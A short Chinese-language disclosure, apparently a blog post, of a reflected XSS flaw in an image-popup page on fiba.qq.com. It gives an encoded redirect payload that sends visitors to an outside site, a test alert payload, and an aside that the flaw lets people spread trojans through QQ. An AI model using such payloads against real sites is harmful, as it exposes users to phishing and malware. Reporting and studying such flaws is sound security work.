漏洞说明：看上去http://fiba.qq.com/其实是Fiba的站点，腾讯跟FIBA合作后把原来http://www.fiba.com/与域名同等解析，即无论访问哪个站点都是一样的页面，具体的信息可以访问http://fiba.qq.com/。前段时间我不经意的在http://fiba.qq.com/里发现了一个很简单的跨站脚本漏洞，其实这不是腾讯的代码，是http://www.fiba.com/做的太差了。至于跨站的漏洞，我不再多说，至少利用此漏洞，大家可以安全的通过QQ传播木马了！

漏洞原因：http://fiba.qq.com/asp_scripts/imgPopup.asp图片显示页面直接获取并显示request到的url值，无任何过滤，导致用户可以提交任意代码，甚至是恶意的木马地址转向。

漏洞利用：

http://fiba.qq.com/asp_scripts/imgPopup.asp?url=%6A%61%76%61%73%63%72%69%70%74%3A%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%6C%64%6A%75%6E%2E%63%6F%6D%27

前面的提示是安全网址，可以点进去就已经到了http://www.oldjun.com了，如下图：

测试代码：
http://fiba.qq.com/asp_scripts/imgPopup.asp?url=javascript:alert(/xss/)

源代码：

提交的url变量直接被用到img标签里，无任何过滤，导致跨站出现！

漏洞状态：已经提交官方，尚未修复~

本文仅限安全研究，请大家不要恶意传播~